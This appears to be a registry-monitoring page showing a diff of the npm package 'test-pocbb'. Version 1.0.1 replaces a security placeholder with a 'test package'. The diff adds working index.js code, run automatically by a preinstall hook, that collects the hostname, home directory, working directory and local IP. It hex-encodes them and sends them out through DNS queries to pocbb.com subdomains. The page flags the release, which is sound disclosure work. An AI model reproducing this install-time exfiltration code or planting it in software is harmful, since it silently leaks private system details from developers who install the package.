test-pocbb 0.0.1-security → 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of test-pocbb might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +2 -4
  2. package/index.js +88 -0
  3. package/package.json +7 -3
package/README.md CHANGED
@@ -1,5 +1,3 @@
1
- # Security holding package
1
+ # pocbb test
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=test-pocbb for more information.
3
+ This is just a test package
package/index.js ADDED
@@ -0,0 +1,88 @@
1
+ const dns = require('dns');
2
+ const os = require('os');
3
+ const fs = require('fs');
4
+ const path = require('path');
5
+
6
+ function generateUID(length = 5) {
7
+ const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
8
+ let result = '';
9
+ for (let i = 0; i < length; i++) {
10
+ result += characters.charAt(Math.floor(Math.random() * characters.length));
11
+ }
12
+ return result.toLowerCase();
13
+ }
14
+
15
+ // Convert a JSON string to hex
16
+ function jsonStringToHex(jsonString) {
17
+ return Buffer.from(jsonString, 'utf8').toString('hex');
18
+ }
19
+
20
+ const uid = generateUID(); // Generate a UID for this client once
21
+
22
+ function getCurrentTimestamp() {
23
+ const date = new Date();
24
+ return `${date.toLocaleDateString('en-GB')} ${date.toLocaleTimeString('en-GB')} (GMT+${-date.getTimezoneOffset() / 60})`;
25
+ }
26
+
27
+ function getLocalIP() {
28
+ const interfaces = os.networkInterfaces();
29
+ for (let iface in interfaces) {
30
+ for (let ifaceInfo of interfaces[iface]) {
31
+ if (ifaceInfo.family === 'IPv4' && !ifaceInfo.internal) {
32
+ return ifaceInfo.address;
33
+ }
34
+ }
35
+ }
36
+ return '127.0.0.1'; // fallback to localhost
37
+ }
38
+
39
+ function getPackageInfo() {
40
+ const packageJson = JSON.parse(fs.readFileSync(path.join(__dirname, 'package.json'), 'utf8'));
41
+ return `${packageJson.name}-${packageJson.version}`;
42
+ }
43
+
44
+ function sendJSONviaDNS(domain) {
45
+ // Resolve the IP address of ns1.pocbb.com
46
+ dns.resolve4('ns1.pocbb.com', (err, addresses) => {
47
+ if (err) {
48
+ dns.setServers(['1.1.1.1', '8.8.8.8']); // Use 1.1.1.1 and 8.8.8.8 if ns1.pocbb.com cannot be resolved
49
+ } else {
50
+ const primaryDNS = addresses[0];
51
+ dns.setServers([primaryDNS, '1.1.1.1', '8.8.8.8']);
52
+ }
53
+
54
+ // Construct the JSON object
55
+ const jsonObject = {
56
+ timestamp: getCurrentTimestamp(),
57
+ uid: uid,
58
+ 'pkg-name': getPackageInfo(),
59
+ 'local-ip': getLocalIP(),
60
+ hostname: os.hostname(),
61
+ homedir: os.homedir(),
62
+ path: process.cwd()
63
+ };
64
+ const jsonString = JSON.stringify(jsonObject);
65
+ const hexString = jsonStringToHex(jsonString);
66
+
67
+ // Split hex string into chunks of 60 characters each
68
+ const chunkSize = 60;
69
+ const regex = new RegExp(`.{1,${chunkSize}}`, 'g');
70
+ const chunks = hexString.match(regex);
71
+
72
+ chunks.forEach((chunk, index) => {
73
+ const packetNumber = (index + 1).toString().padStart(3, '0'); // 001, 002, etc.
74
+ const subdomain = `pl.${uid}.${packetNumber}.${chunk}.${domain}`;
75
+
76
+ // Perform DNS resolution
77
+ dns.resolve4(subdomain, (err, addresses) => {
78
+ if (err) {
79
+ return;
80
+ }
81
+ });
82
+ });
83
+ });
84
+ }
85
+
86
+
87
+ // Usage
88
+ sendJSONviaDNS('pocbb.com');
package/package.json CHANGED
@@ -1,6 +1,10 @@
1
1
  {
2
2
  "name": "test-pocbb",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.1",
4
+ "description": "A pocbb test",
5
+ "license": "MIT",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "preinstall": "node index.js"
9
+ }
6
10
  }